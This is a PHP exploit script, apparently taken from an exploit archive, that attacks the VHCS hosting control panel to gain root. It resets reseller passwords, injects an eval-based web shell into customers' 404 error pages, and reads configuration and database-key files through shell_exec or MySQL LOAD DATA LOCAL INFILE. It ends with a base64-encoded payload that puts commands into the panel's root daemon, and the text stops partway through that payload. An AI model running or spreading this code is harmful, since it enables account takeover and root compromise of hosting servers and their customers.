VHCS <= (vhcs2_daemon) Remote Root Exploit
来源:http://acid-root.new.fr/ 作者:DarkFig 发布时间:2008-03-10
#!/usr/bin/php -q <?php error_reporting(E_ALL ^ E_NOTICE); # # # darkfig@darky:/# ./vhcs_sploit.php -url http://localhost/vhcs2/ # # VHCS <= (vhcs2_daemon) Remote Root Exploit # -------------------------------------------------- # # About: # by DarkFig < gmdarkfig (at) gmail (dot) com > # http://acid-root.new.fr/ # #acidroot@irc.worldnet.net # # Exploit: # + Logged in (Administrator) # + The administrator has 2 resellers # / Changing dareseller's password # / Trying to connect as dareseller:thatpwnz # + Login successful # + The reseller has 2 users # + Host domaintest.fr is connected # / Trying to write PHP code # + PHP code successfully written # / We'll have to bypass open_basedir cause safe_mode=On # - User doesn't have SQL rights # / Host domaintest.fr isn't a valid user # + Host xpliamaclient.com is connected # / Trying to write PHP code # + PHP code successfully written # / We'll have to bypass open_basedir cause safe_mode=On # - User doesn't have SQL rights # / Host xpliamaclient.com isn't a valid user # / Changing unautresel's password # / Trying to connect as unautresel:thatpwnz # + Login successful # + The reseller has 1 users # + Host thegoodone.com is connected # / Trying to write PHP code # + PHP code successfully written # / We'll have to bypass open_basedir cause safe_mode=On # / Trying to create a database # + Database 92xpl_db39 successfully created # + Using database id 12 # / Trying to add SQL user # + User 93xpl_usr2 successfully created # + Using SQL user id 17 # + Host thegoodone.com is a valid user # + Logged in (thegoodone.com - Client) # / Trying to load files via local_infile # + Ok: /etc/vhcs2/vhcs2.conf # + Ok: /var/www/vhcs2/gui/include/vhcs2-db-keys.php # + Now you can execute commands as root =] # + root@thegoodone.com: id # # uid=0(root) gid=0(root) #
############################################## # THE VHCS CODE IS AFTER THE PHPSPLOIT CLASS ##############################################
/* * * Copyright (C) darkfig * * This program is free software; you can redistribute it and/or * modify it under the terms of the GNU General Public License * as published by the Free Software Foundation; either version 2 * of the License, or (at your option) any later version. * * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU General Public License for more details. * * You should have received a copy of the GNU General Public License * along with this program; if not, write to the Free Software * Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. * * TITLE: PhpSploit Class * REQUIREMENTS: PHP 4 / PHP 5 * VERSION: 2.0 * LICENSE: GNU General Public License * ORIGINAL URL: http://www.acid-root.new.fr/tools/03061230.txt * FILENAME: phpsploitclass.php * * CONTACT: gmdarkfig@gmail.com (french / english) * GREETZ: Sparah, Ddx39 * * DESCRIPTION: * The phpsploit is a class implementing a web user agent. * You can add cookies, headers, use a proxy server with (or without) a * basic authentification. It supports the GET and the POST method. It can * also be used like a browser with the cookiejar() function (which allow * a server to add several cookies for the next requests) and the * allowredirection() function (which allow the script to follow all * redirections sent by the server). It can return the content (or the * headers) of the request. Others useful functions can be used for debugging. * A manual is actually in development but to know how to use it, you can * read the comments. * * CHANGELOG: * * [2007-06-10] (2.0) * * Code: Code optimization * * New: Compatible with PHP 4 by default * * [2007-01-24] (1.2) * * Bug #2 fixed: Problem concerning the getcookie() function ((|;)) * * New: multipart/form-data enctype is now supported * * [2006-12-31] (1.1) * * Bug #1 fixed: Problem concerning the allowredirection() function (chr(13) bug) * * New: You can now call the getheader() / getcontent() function without parameters * * [2006-12-30] (1.0) * * First version * */
class phpsploit { var $proxyhost; var $proxyport; var $host; var $path; var $port; var $method; var $url; var $packet; var $proxyuser; var $proxypass; var $header; var $cookie; var $data; var $boundary; var $allowredirection; var $last_redirection; var $cookiejar; var $recv; var $cookie_str; var $header_str; var $server_content; var $server_header;
/** * This function is called by the * get()/post()/formdata() functions. * You don't have to call it, this is * the main function. * * @access private * @return string $this->recv ServerResponse * */ function sock() { if(!empty($this->proxyhost) && !empty($this->proxyport)) $socket = @fsockopen($this->proxyhost,$this->proxyport); else $socket = @fsockopen($this->host,$this->port); if(!$socket) die("Error: Host seems down"); if($this->method=='get') $this->packet = 'GET '.$this->url." HTTP/1.1\r\n"; elseif($this->method=='post' or $this->method=='formdata') $this->packet = 'POST '.$this->url." HTTP/1.1\r\n"; else die("Error: Invalid method"); if(!empty($this->proxyuser)) $this->packet .= 'Proxy-Authorization: Basic '.base64_encode($this->proxyuser.':'.$this->proxypass)."\r\n"; if(!empty($this->header)) $this->packet .= $this->showheader(); if(!empty($this->cookie)) $this->packet .= 'Cookie: '.$this->showcookie()."\r\n"; $this->packet .= 'Host: '.$this->host."\r\n"; $this->packet .= "Connection: Close\r\n"; if($this->method=='post') { $this->packet .= "Content-Type: application/x-www-form-urlencoded\r\n"; $this->packet .= 'Content-Length: '.strlen($this->data)."\r\n\r\n"; $this->packet .= $this->data."\r\n"; } elseif($this->method=='formdata') { $this->packet .= 'Content-Type: multipart/form-data; boundary='.str_repeat('-',27).$this->boundary."\r\n"; $this->packet .= 'Content-Length: '.strlen($this->data)."\r\n\r\n"; $this->packet .= $this->data; }
$this->packet .= "\r\n"; $this->recv = '';
while(!feof($socket)) $this->recv .= fgets($socket);
if($this->cookiejar) $this->getcookie();
if($this->allowredirection) return $this->getredirection(); else return $this->recv; }
/** * This function allows you to add several * cookies in the request. * * @access public * @param string cookn CookieName * @param string cookv CookieValue * @example $this->addcookie('name','value') * */ function addcookie($cookn,$cookv) { if(!isset($this->cookie)) $this->cookie = array();
$this->cookie[$cookn] = $cookv; }
/** * This function allows you to add several * headers in the request. * * @access public * @param string headern HeaderName * @param string headervalue Headervalue * @example $this->addheader('Client-IP', '') * */ function addheader($headern,$headervalue) { if(!isset($this->header)) $this->header = array(); $this->header[$headern] = $headervalue; }
/** * This function allows you to use an * http proxy server. Several methods * are supported. * * @access public * @param string proxy ProxyHost * @param integer proxyp ProxyPort * @example $this->proxy('localhost',8118) * @example $this->proxy('localhost:8118') * */ function proxy($proxy,$proxyp='') { if(empty($proxyp)) { $proxarr = explode(':',$proxy); $this->proxyhost = $proxarr[0]; $this->proxyport = (int)$proxarr[1]; } else { $this->proxyhost = $proxy; $this->proxyport = (int)$proxyp; }
if($this->proxyport > 65535) die("Error: Invalid port number"); }
/** * This function allows you to use an * http proxy server which requires a * basic authentification. Several * methods are supported: * * @access public * @param string proxyauth ProxyUser * @param string proxypass ProxyPass * @example $this->proxyauth('user','pwd') * @example $this->proxyauth('user:pwd'); * */ function proxyauth($proxyauth,$proxypass='') { if(empty($proxypass)) { $posvirg = strpos($proxyauth,':'); $this->proxyuser = substr($proxyauth,0,$posvirg); $this->proxypass = substr($proxyauth,$posvirg+1); } else { $this->proxyuser = $proxyauth; $this->proxypass = $proxypass; } }
/** * This function allows you to set * the 'User-Agent' header. * * @access public * @param string useragent Agent * @example $this->agent('Firefox') * */ function agent($useragent) { $this->addheader('User-Agent',$useragent); }
/** * This function returns the headers * which will be in the next request. * * @access public * @return string $this->header_str Headers * @example $this->showheader() * */ function showheader() { $this->header_str = ''; if(!isset($this->header)) return; foreach($this->header as $name => $value) $this->header_str .= $name.': '.$value."\r\n"; return $this->header_str; }
/** * This function returns the cookies * which will be in the next request. * * @access public * @return string $this->cookie_str Cookies * @example $this->showcookie() * */ function showcookie() { $this->cookie_str = ''; if(!isset($this->cookie)) return; foreach($this->cookie as $name => $value) $this->cookie_str .= $name.'='.$value.'; ';
return $this->cookie_str; }
/** * This function returns the last * formed http request. * * @access public * @return string $this->packet HttpPacket * @example $this->showlastrequest() * */ function showlastrequest() { if(!isset($this->packet)) return; else return $this->packet; }
/** * This function sends the formed * http packet with the GET method. * * @access public * @param string url Url * @return string $this->sock() * @example $this->get('localhost/index.php?var=x') * @example $this->get('http://localhost:88/tst.php') * */ function get($url) { $this->target($url); $this->method = 'get'; return $this->sock(); }
/** * This function sends the formed * http packet with the POST method. * * @access public * @param string url Url * @param string data PostData * @return string $this->sock() * @example $this->post('http://localhost/','helo=x') * */ function post($url,$data) { $this->target($url); $this->method = 'post'; $this->data = $data; return $this->sock(); }
/** * This function sends the formed http * packet with the POST method using * the multipart/form-data enctype. * * @access public * @param array array FormDataArray * @return string $this->sock() * @example $formdata = array( * frmdt_url => 'http://localhost/upload.php', * frmdt_boundary => '123456', # Optional * 'var' => 'example', * 'file' => array( * frmdt_type => 'image/gif', # Optional * frmdt_transfert => 'binary' # Optional * frmdt_filename => 'hello.php, * frmdt_content => '<?php echo 1; ?>')); * $this->formdata($formdata); * */ function formdata($array) { $this->target($array[frmdt_url]); $this->method = 'formdata'; $this->data = ''; if(!isset($array[frmdt_boundary])) $this->boundary = 'phpsploit'; else $this->boundary = $array[frmdt_boundary];
foreach($array as $key => $value) { if(!preg_match('#^frmdt_(boundary|url)#',$key)) { $this->data .= str_repeat('-',29).$this->boundary."\r\n"; $this->data .= 'Content-Disposition: form-data; name="'.$key.'";'; if(!is_array($value)) { $this->data .= "\r\n\r\n".$value."\r\n"; } else { $this->data .= ' filename="'.$array[$key][frmdt_filename]."\";\r\n";
if(isset($array[$key][frmdt_type])) $this->data .= 'Content-Type: '.$array[$key][frmdt_type]."\r\n";
if(isset($array[$key][frmdt_transfert])) $this->data .= 'Content-Transfer-Encoding: '.$array[$key][frmdt_transfert]."\r\n";
$this->data .= "\r\n".$array[$key][frmdt_content]."\r\n"; } } }
$this->data .= str_repeat('-',29).$this->boundary."--\r\n"; return $this->sock(); }
/** * This function returns the content * of the server response, without * the headers. * * @access public * @param string code ServerResponse * @return string $this->server_content * @example $this->getcontent() * @example $this->getcontent($this->get('http://localhost/')) * */ function getcontent($code='') { if(empty($code)) $code = $this->recv;
$code = explode("\r\n\r\n",$code); $this->server_content = ''; for($i=1;$i<count($code);$i++) $this->server_content .= $code[$i];
return $this->server_content; }
/** * This function returns the headers * of the server response, without * the content. * * @access public * @param string code ServerResponse * @return string $this->server_header * @example $this->getcontent() * @example $this->getcontent($this->post('http://localhost/','1=2')) * */ function getheader($code='') { if(empty($code)) $code = $this->recv;
$code = explode("\r\n\r\n",$code); $this->server_header = $code[0]; return $this->server_header; }
/** * This function is called by the * cookiejar() function. It adds the * value of the "Set-Cookie" header * in the "Cookie" header for the * next request. You don't have to * call it. * * @access private * @param string code ServerResponse * */ function getcookie() { foreach(explode("\r\n",$this->getheader()) as $header) { if(preg_match('/set-cookie/i',$header)) { $fequal = strpos($header,'='); $fvirgu = strpos($header,';'); // 12=strlen('set-cookie: ') $cname = substr($header,12,$fequal-12); $cvalu = substr($header,$fequal+1,$fvirgu-(strlen($cname)+12+1)); $this->cookie[trim($cname)] = trim($cvalu); } } }
/** * This function is called by the * get()/post() functions. You * don't have to call it. * * @access private * @param string urltarg Url * @example $this->target('http://localhost/') * */ function target($urltarg) { if(!ereg('^http://',$urltarg)) $urltarg = 'http://'.$urltarg; $urlarr = parse_url($urltarg); $this->url = 'http://'.$urlarr['host'].$urlarr['path']; if(isset($urlarr['query'])) $this->url .= '?'.$urlarr['query']; $this->port = !empty($urlarr['port']) ? $urlarr['port'] : 80; $this->host = $urlarr['host']; if($this->port != '80') $this->host .= ':'.$this->port;
if(!isset($urlarr['path']) or empty($urlarr['path'])) die("Error: No path precised");
$this->path = substr($urlarr['path'],0,strrpos($urlarr['path'],'/')+1);
if($this->port > 65535) die("Error: Invalid port number"); } /** * If you call this function, * the script will extract all * 'Set-Cookie' headers values * and it will automatically add * them into the 'Cookie' header * for all next requests. * * @access public * @param integer code 1(enabled) 0(disabled) * @example $this->cookiejar(0) * @example $this->cookiejar(1) * */ function cookiejar($code) { if($code=='0') $this->cookiejar=FALSE;
elseif($code=='1') $this->cookiejar=TRUE; }
/** * If you call this function, * the script will follow all * redirections sent by the server. * * @access public * @param integer code 1(enabled) 0(disabled) * @example $this->allowredirection(0) * @example $this->allowredirection(1) * */ function allowredirection($code) { if($code=='0') $this->allowredirection=FALSE; elseif($code=='1') $this->allowredirection=TRUE; }
/** * This function is called if * allowredirection() is enabled. * You don't have to call it. * * @access private * @return string $this->get('http://'.$this->host.$this->path.$this->last_redirection) * @return string $this->get($this->last_redirection) * @return string $this->recv; * */ function getredirection() { if(preg_match('/(location|content-location|uri): (.*)/i',$this->getheader(),$codearr)) { $this->last_redirection = trim($codearr[2]); if(!ereg('://',$this->last_redirection)) return $this->get('http://'.$this->host.$this->path.$this->last_redirection);
else return $this->get($this->last_redirection); } else return $this->recv; }
/** * This function allows you * to reset some parameters. * * @access public * @param string func Param * @example $this->reset('header') * @example $this->reset('cookie') * @example $this->reset() * */ function reset($func='') { switch($func) { case 'header': $this->header = array(''); break; case 'cookie': $this->cookie = array(''); break; default: $this->cookiejar = ''; $this->header = array(''); $this->cookie = array(''); $this->allowredirection = ''; break; } } }
class vhcs_xpl extends phpsploit { var $sleep_time = 4;
# -rw-r--r-- 1 root root var $conf_path = '/etc/vhcs2/vhcs2.conf';
# -r-------- 1 www-data www-data var $keys_path = '/var/www/vhcs2/gui/include/vhcs2-db-keys.php';
var $head_arr = array( 'admin/index.php' => 3, 'reseller/index.php' => 2, '../reseller/index.php' => 2, 'client/index.php' => 1, '' => 0);
var $privileges = array( 3 => 'Administrator', 2 => 'Reseller', 1 => 'Client');
var $reg_arr = array( 1 => '#edit_reseller\.php\?edit_id=([0-9]+)" class="link">(.*) </a> </td>#i', 2 => '#edit_user.php\?edit_id=([0-9]+)" class="link">(.*)</a></td>#i', 3 => '#delete_sql_database\.php\?id=([0-9]+)#i', 4 => '#delete_sql_database\.php\?id=([0-9]+)#i', 5 => '#sql_execute_query.php\?id=([0-9]+)#i');
var $flags = array( -1 => '-', 0 => '/', 1 => '+');
function main() { $this->agent('Mozilla Firefox'); $this->cookiejar(1);
$this->uri = $this->getparam('url', TRUE); $this->url_arr = parse_url($this->uri);
$this->patch = $this->getparam('patch'); $this->proxh = $this->getparam('proxhost'); $this->proxa = $this->getparam('proxauth');
if($this->proxh) $this->proxy($this->proxh);
if($this->proxa) $this->proxyauth($this->proxa);
print "\nExploit:"; $this->type = $this->login();
if(empty($this->type)) { if(!$this->patch) { $this->msg('A patch has been applied to this website', -1); $this->msg("See RoMaNSoFt's advisory for more details", -1); $this->msg('Try with the -patch option', -1, 1); } else $this->msg('Bad username/password', -1, 1); }
$this->msg("Logged in (".$this->usr.' - '.$this->privileges[$this->type].')', 1);
return; }
function getparam($param, $nec=FALSE) { global $argv;
foreach($argv as $value => $key) { if($key === '-'.$param) return $argv[$value+1]; }
if($nec) $this->usage(); return FALSE; }
function mhead() { print "\n VHCS <= (vhcs2_daemon) Remote Root Exploit"; print "\n --------------------------------------------------\n"; print "\nAbout:"; print "\n by DarkFig < gmdarkfig (at) gmail (dot) com >"; print "\n http://acid-root.new.fr/"; print "\n #acidroot@irc.worldnet.net"; print "\n"; return; } function usage() { print "\nUsage:"; print "\n vhcsxpl.php -url <url> [options...]\n"; print "\nOptions:"; print "\n -patch <user:pwd> Unofficial patch applied"; print "\n -proxhost <ip> If you wanna use a proxy"; print "\n -proxauth <usr:pwd> Proxy with authentication\n"; print "\n"; exit(1); }
function log_as() { $this->msg("Trying to connect as ".$this->usr.':'.$this->pwd, 0); $this->allowredirection(1);
$this->post($this->uri.'chk_login.php', 'uname='.$this->usr.'&upass='.$this->pwd.'&Submit=+++Login+++');
$this->redir_type = $this->get_type_by_redir();
if($this->redir_type == 0) $this->msg('Login attempt failed', -1);
else $this->msg('Login successful', 1);
return $this->redir_type; }
function get_type_by_redir() { $this->redir_arr = parse_url($this->last_redirection); $this->allowredirection(0);
return $this->head_arr[$this->redir_arr['path']]; } function login() { if($this->patch) { $this->idents = explode(':', $this->patch); list($this->usr, $this->pwd) = $this->idents;
$this->type = $this->log_as();
return $this->log_as_user(); } else { $this->get($this->uri.'admin/manage_users.php');
$this->type = 3;
if(ereg('add_user\.php', $this->getcontent())) return $this->log_as_user();
else return 0; } }
function log_as_user() { if($this->type == 3) $this->logged_as_admin();
if($this->type == 2) $this->logged_as_reseller();
if($this->type == 1) { if(!$this->patch) return 1;
else return $this->valid_user(); }
else return 0; }
function valid_user() { if($this->write_code()) { # open_basedir + safe_mode if($this->is_safe()) { if($this->bypass_with_db()) return 1;
else return 0; } else return 1; } return 0; }
function logged_as_admin() { $this->msg('Logged in ('.$this->privileges[3].')', 1);
preg_match_all($this->reg_arr[1], $this->getcontent(), $resellers);
$this->reseller_count = count($resellers[1]);
$this->msg('The administrator has '.$this->reseller_count.' resellers', 1);
for($i=0; $i<$this->reseller_count; $i++) { $this->usr = $resellers[2][$i]; $this->pwd = 'thatpwnz';
if(!$this->patch) { $this->msg('Changing '.$resellers[2][$i]."'s password", 0);
$this->reseller_dat = '';
# only checked ip preg_match_all('#name="ip_([0-9]+)" value="asgned" checked#i', $this->getcontent(), $reseller_ips);
$this->ip_count = count($reseller_ips[1]); $this->ip_dat = '';
for($j=0; $j<$this->ip_count; $j++) { $this->ip_dat .= 'ip_'.$reseller_ips[1][$j].'=asgned';
if($j != $this->ip_count-1) $this->ip_dat .= '&'; }
# Change reseller's password/mail # This is needed if it was run without -path # Because we can't click on the 'Change' button. # # pwd: thatpwnz # mail: <reseller_name>@ohyeah.com # $this->post($this->uri.'admin/edit_reseller.php', 'username='.$resellers[2][$i].'&pass=thatpwnz&'. 'pass_rep=thatpwnz&email='.$resellers[2][$i].''. '%40ohyeah.com&nreseller_max_domain_cnt=0&nres'. 'eller_max_subdomain_cnt=0&nreseller_max_alias'. '_cnt=0&nreseller_max_mail_cnt=0&nreseller_max'. '_ftp_cnt=0&nreseller_max_sql_db_cnt=0&nresell'. 'er_max_sql_user_cnt=0&nreseller_max_traffic=0'. '&nreseller_max_disk=0&'.$this->ip_dat.'&custo'. 'mer_id=&fname=&lname=&firm=&zip=&city=&countr'. 'y=&street1=&street2=&phone=&fax=&Submit=++Upd'. 'ate++&uaction=update_reseller&edit_id='. $resellers[1][$i].'&edit_username='. $resellers[2][$i]);
if($this->log_as() != 2) return 0; } else { $this->allowredirection(1);
if($this->get_type_by_redir() != 2) return 0; }
if($this->logged_as_reseller()) return 1;
$this->reset('cookie'); $this->get($this->uri.'reseller/change_user_interface.php?action=go_back'); }
return 0; }
function logged_as_reseller() { $this->get($this->uri.'reseller/users.php');
preg_match_all($this->reg_arr[2], $this->getcontent(), $users); array_walk($users[2], 'trim'); $this->user_count = count($users[1]); $this->msg('The reseller has '.$this->user_count. ' users', 1);
$this->patch = FALSE;
for($i=0; $i<$this->user_count; $i++) { if($this->is_alive($users[2][$i])) { $this->usr = $users[2][$i];
$this->type = 1;
$this->msg('Host '.$this->usr.' is connected', 1);
if($this->valid_user()) { $this->msg('Host '.$this->usr.' is a valid user', 1); return TRUE; } else $this->msg("Host ".$this->usr." isn't a valid user", 0); } else $this->msg('Host '.$users[2][$i].' seems down', -1);
$this->get($this->uri.'client/change_user_interface.php?action=go_back'); }
return FALSE; }
function bypass_with_db() { $this->get($this->dmn_vhcs_url.'client/index.php');
if(!ereg('manage_sql.php', $this->getcontent()) and !$edit) { $this->msg("User ".$this->ur." doesn't have SQL rights", -1);
return FALSE; } # No database if(!$this->got_db()) { $this->msg('Trying to create a database', 0);
$this->tmp_db_name = rand(0,100).'xpl_db'.rand(0,100);
# Database: ..xpl_db.. $this->post($this->dmn_vhcs_url.'client/add_sql_database.php', 'db_name='.$this->tmp_db_name.'&id_pos=start&Submit=++Add++&'. 'uaction=add_db');
if($this->got_db()) $this->msg('Database '.$this->tmp_db_name.' successfully created', 1);
else { $this->msg("Can't create the database ".$this->tmp_db_name, 0);
return FALSE; } }
# First database $this->db_id = $this->sql_db_ids[1];
$this->msg('Using database id '.$this->db_id, 1);
if(!$this->got_db_user()) { $this->msg('Trying to add SQL user', 0);
$this->tmp_db_user = rand(0,100).'xpl_usr'.rand(0,100); # SQL user: ..xpl_usr..:xpl_pwd $this->post($this->dmn_vhcs_url.'client/sql_add_user.php', 'user_name='.$this->tmp_db_user.'&id_pos=end&pass=xpl_pw'. 'd&pass_rep=xpl_pwd&Add_New=++Add++&uaction=add_user&id='. $this->db_id);
if($this->got_db_user()) $this->msg('User '.$this->tmp_db_user.' successfully created', 1);
else { $this->msg("Can't create the SQL user ".$this->tmp_db_user, 0);
return FALSE; } }
# First SQL user id associed with the database $this->db_user_id = $this->sql_usrs[1];
$this->msg('Using SQL user id '.$this->db_user_id, 1);
return TRUE; }
function got_db_user() { $this->get($this->dmn_vhcs_url.'client/manage_sql.php');
$this->content_arr = explode("\n", $this->getcontent());
$this->is_sql_db_usr = FALSE;
for($i=0; $i<count($this->content_arr); $i++) { if(preg_match($this->reg_arr[4], $this->content_arr[$i], $this->sql_db_id)) { if($this->sql_db_id[1] == $this->db_id) $this->is_sql_db_usr = TRUE;
else $this->is_sql_db_usr = FALSE; }
if(preg_match($this->reg_arr[5], $this->content_arr[$i], $this->sql_usrs)) { if($this->is_sql_db_usr) return TRUE; } } return FALSE; }
function got_db() { $this->get($this->dmn_vhcs_url.'client/manage_sql.php');
preg_match($this->reg_arr[3], $this->getcontent(), $this->sql_db_ids);
if(empty($this->sql_db_ids)) return FALSE;
else return TRUE; }
function is_alive($domain_name) { if(gethostbyname($domain_name) != $domain_name) return TRUE;
else return FALSE; }
function write_code() { $this->msg('Trying to write PHP code', 0);
$this->dmn_url = 'http://'.$this->usr; $this->dmn_vhcs_url = $this->dmn_url.$this->url_arr['path'];
$this->get($this->dmn_url.'/errors/404/index.php'); $this->old_404 = $this->getcontent();
$this->phpc = '<?php ' .'error_reporting(0); ' .'if(isset($_SERVER[\'HTTP_SHELL\'])) ' .'{ eval(base64_decode($_SERVER[\'HTTP_SHELL\'])); exit(0); } ' .'?>';
$this->new_404 = $this->phpc.$this->old_404;
$this->post($this->dmn_vhcs_url.'client/error_pages.php', 'error='.urlencode($this->new_404).'&uaction=updt_error&eid=404&Submit=+Save+');
$this->exec_php('print "itworkz";');
if(ereg('itworkz', $this->getcontent())) { $this->msg('PHP code successfully written', 1);
return TRUE; } else { $this->msg("Can't write PHP code", -1);
return FALSE; } }
function get_vhcs_conf() { if($this->safe_mode) $this->msg('Trying to load files via local_infile', 0);
else $this->msg('Trying to load files via shell_exec', 0);
$this->lf_conf = $this->path_content($this->conf_path); $this->lf_conf = trim($this->lf_conf, "\r");
$this->vhcs_conf = explode("\n", $this->lf_conf);
$this->conf = array();
foreach($this->vhcs_conf as $this->conf_line) { # comment if(!ereg('^(\s*)#', $this->conf_line)) { $this->pos = strpos($this->conf_line, '='); $this->name = strtoupper(trim(substr($this->conf_line, 0, $this->pos))); $this->value = trim(substr($this->conf_line, $this->pos+1));
$this->conf[$this->name] = $this->value; } }
$this->php_keys_code = $this->path_content($this->keys_path);
return; }
function path_content($path) { # open_basedir On/off # safe_mode = Off if(!$this->safe_mode) { $this->phpc = 'print shell_exec("cat '.$path.'");';
$this->file_content = $this->getcontent();
# open_basedir On/Off # safe_mode = On else { $this->rand_table = rand().'tmp_hax'.rand();
$this->sql_query = "CREATE TABLE ".$this->rand_table." (content text not null); ". "LOAD DATA LOCAL INFILE '$path' INTO TABLE ".$this->rand_table. " FIELDS TERMINATED BY '__EOF__' ESCAPED BY '' LINES TERMINAT". "ED BY '__EOF__'; SELECT CONCAT(CHAR(80,87,78,69,68,67,79,78,". "84,69,78,84),HEX(content),CHAR(80,87,78,69,68,67,79,78,84,69". ",78,84)) FROM ".$this->rand_table."; DROP TABLE ". $this->rand_table;
$this->sql_arr = explode(';', $this->sql_query); $this->sql_cnt = count($this->sql_arr);
for($i=0; $i<$this->sql_cnt; $i++) { $this->sql_res = $this->exec_sql($this->sql_arr[$i]);
if($i == $this->sql_cnt-2) $this->file_content = $this->sql_res; } }
if(!$this->file_content) { $this->msg("A problem occurred while trying to read the file $path", -1); if($this->safe_mode) $this->msg("local_infile=Off or we don't have sufficient access rights to the file", -1, 2);
else $this->msg("We don't have sufficient access rights to the file", -1, -2); } else $this->msg("Ok: $path", 1);
return $this->file_content; }
function exec_sql($query) { $this->post($this->dmn_vhcs_url.'client/sql_execute_query.php', 'user_name=&sql_query='.$query.'&Submit=+Execute+&uaction=exe'. 'cute_query&id='.$this->db_user_id);
$this->sql_result = '';
if(ereg('PWNEDCONTENT', $this->getcontent())) { $this->sql_res_arr = explode('PWNEDCONTENT', $this->getcontent());
$this->sql_result = pack('H*', $this->sql_res_arr[1]); } return $this->sql_result; }
function is_safe() { $this->phpc = 'if(in_array(strtoupper(ini_get("safe_mode")),array("ON","1")) ' .'or !function_exists("shell_exec")) ' .'{ print "safe_mode=on"; }';
# open_basedir always set if(ereg('safe_mode=on', $this->getcontent())) { $this->msg("We'll have to bypass open_basedir cause safe_mode=On", 0);
$this->safe_mode = TRUE; } else { $this->msg('PHP configured with default safe_mode value (Off)', 0);
$this->safe_mode = FALSE; }
return $this->safe_mode; }
function exec_cmd() { $this->msg("Now you can execute commands as root =]", 1);
$this->woot_code = 'PD9waHAKCi8qCm1haWwoJ2xlZXRAcHduZWQuY29tJywgJ3Z1bG' .'5lcmFibGUgdmhjcyBob3N0ICEnLCAndGh4IHRvIHRoZSBzayAh' .'IHZoY3MgdnVsbiBob3N0OiAnLiRfU0VSVkVSWydSRU1PVEVfQU' .'REUiddKTsKdGhpcyBpcyBhIGpva2UgPVAgd2hlbiB5b3UgdXNl' .'IGVuY29kZWQgcGhwIGNvZGUsIHNlZSB3aGF0IGlzIGl0IGJlZm' .'9yZSB1c2luZyBpdCA9KQoqLwokdmFsaWRfdiA9ICdIVFRQX1NQ' .'TE9JVF8nOwoKZm9yZWFjaCgkX1NFUlZFUiBhcyAkaGVhZGVyID' .'0+ICR2YWx1ZSkKewoJaWYoIWlzX2FycmF5KCR2YWx1ZSkpCgl7' .'CgkJJHZhbHVlID0gYmFzZTY0X2RlY29kZSgkdmFsdWUpOwoKCQ' .'lpZihlcmVnKCR2YWxpZF92LCRoZWFkZXIpKQoJCXsKCQkJaWYo' .'ZXJlZygnUEhQX0tFWVMnLCAkaGVhZGVyKSkKCQkJICAgZXZhbC' .'gkdmFsdWUpOwoKCQkJZWxzZQoJCQl7CgkJCQkkdmFyX24gID0g' .'c3RydG9sb3dlcihzdHJfcmVwbGFjZSgkdmFsaWRfdiwnJywgJG' .'hlYWRlcikpOwoJCQkJJCR2YXJfbiA9ICR2YWx1ZTsKCQkJfQoJ' .'CX0KCX0KfQoKbXlzcWxfY29ubmVjdCgkZGJfaG9zdCwkZGJfdX' .'NlcixkZWNyeXB0X2RiX3Bhc3N3b3JkKCRkYl9wYXNzKSk7Cm15' .'c3FsX3NlbGVjdF9kYigkZGJfbmFtZSk7CgokZmlsZSA9IGFkZH' .'NsYXNoZXMoJGZpbGUpOwokY21kICA9IGFkZHNsYXNoZXMoJGNt' .'ZCk7CiRWZXJzaW9uID0gJHZlcnNpb247CgokYWRkID0gYXJyYX' .'koKTsKJGFkZFtdID0gCiJJTlNFUlQgSU5UTyBkb21haW4gKGBk' .'b21haW5fbmFtZWAsYGRvbWFpbiIuCiJfZ2lkYCxgZG9tYWluX3' .'VpZGAsYGRvbWFpbl9hZG1pbl9pZGAsYGRvbSIuCiJhaW5fY3Jl' .'YXRlZF9pZGAsYGRvbWFpbl9jcmVhdGVkYCxgZG9tYWluXyIuCi' .'JsYXN0X21vZGlmaWVkYCxgZG9tYWluX21haWxhY2NfbGltaXRg' .'LGBkbyIuCiJtYWluX2Z0cGFjY19saW1pdGAsYGRvbWFpbl90cm' .'FmZmljX2xpbWl0YCIuCiIsYGRvbWFpbl9zcWxkX2xpbWl0YCxg' .'ZG9tYWluX3NxbHVfbGltaXRgLCIuCiJgZG9tYWluX3N0YXR1c2' .'AsYGRvbWFpbl9hbGlhc19saW1pdGAsYGRvbSIuCiJhaW5fc3Vi' .'ZF9saW1pdGAsYGRvbWFpbl9pcF9pZGAsYGRvbWFpbl9kaSIuCi' .'Jza19saW1pdGAsYGRvbWFpbl9kaXNrX3VzYWdlYCxgZG9tYWlu' .'X3BocCIuCiJgLGBkb21haW5fY2dpYCkgVkFMVUVTICgnZGVsZX' .'RlbWViaWF0Y2g7JGNtZCIuCiIgPiAkZmlsZTtybSAvdG1wL2h0' .'YWNjZXNzLXVzZXItY2YtZGVsZXRlbSIuCiJlYmlhdGNoO2VjaG' .'8gMSMnLCcwJywgJzAnLCAnLTEnLCAnLTEnLCAnMCIuCiInLCAn' .'MCcsICcwJywgJzAnLCAnMCcsICcwJywgJzAnLCdvaycsICcwJy' .'IuCiIsJzAnLCAnLTEnLCAnMCcsICcwJywgJ3llcycsICd5ZXMn' .'KSI7CgokYWRkW10gPQoiSU5TRVJUIElOVE8gaHRhY2Nlc3MgKG' .'BkbW5faWRgLGB1c2VyX2lkYCwiLgoiYGdyb3VwX2lkYCxgYXV0' .'aF90eXBlYCxgYXV0aF9uYW1lYCxgcGF0aGAiLgoiLGBzdGF0dX' .'NgKSBWQUxVRVMgKChTRUxFQ1QgZG9tYWluX2lkIEZST00iLgoi' .'IGRvbWFpbiBXSEVSRSBkb21haW5fbmFtZSBMSUtFICclJGZpbG' .'UlJykiLgoiLC0xLDAsJ0Jhc2ljJywnaHVodScsJy90bXAnLCd0' .'b2FkZCcpIjsKCmV4ZWNfc3FsKCRhZGQpOwoKc2VuZF9yZXF1ZX' .'N0KCk7CnNsZWVwKCRzbGVlcF90aW1lKTsKcHJpbnQoZmlsZV9n' .'ZXRfY29udGVudHMoJGZpbGUpKTsKdW5saW5rKCRmaWxlKTsKCi' .'RkZWwgPSBhcnJheSgpOwokZGVsW10gPSAKIkRFTEVURSBGUk9N' .'IGh0YWNjZXNzIFdIRVJFIGRtbl9pZCA9IChTRUxFQyIuCiJUIG' .'RvbWFpbl9pZCBGUk9NIGRvbWFpbiBXSEVSRSBkb21haW5fbmFt' .'ZSAiLgoiTElLRSAnJSRmaWxlJScpIjsKCiRkZWxbXSA9CiJERU' 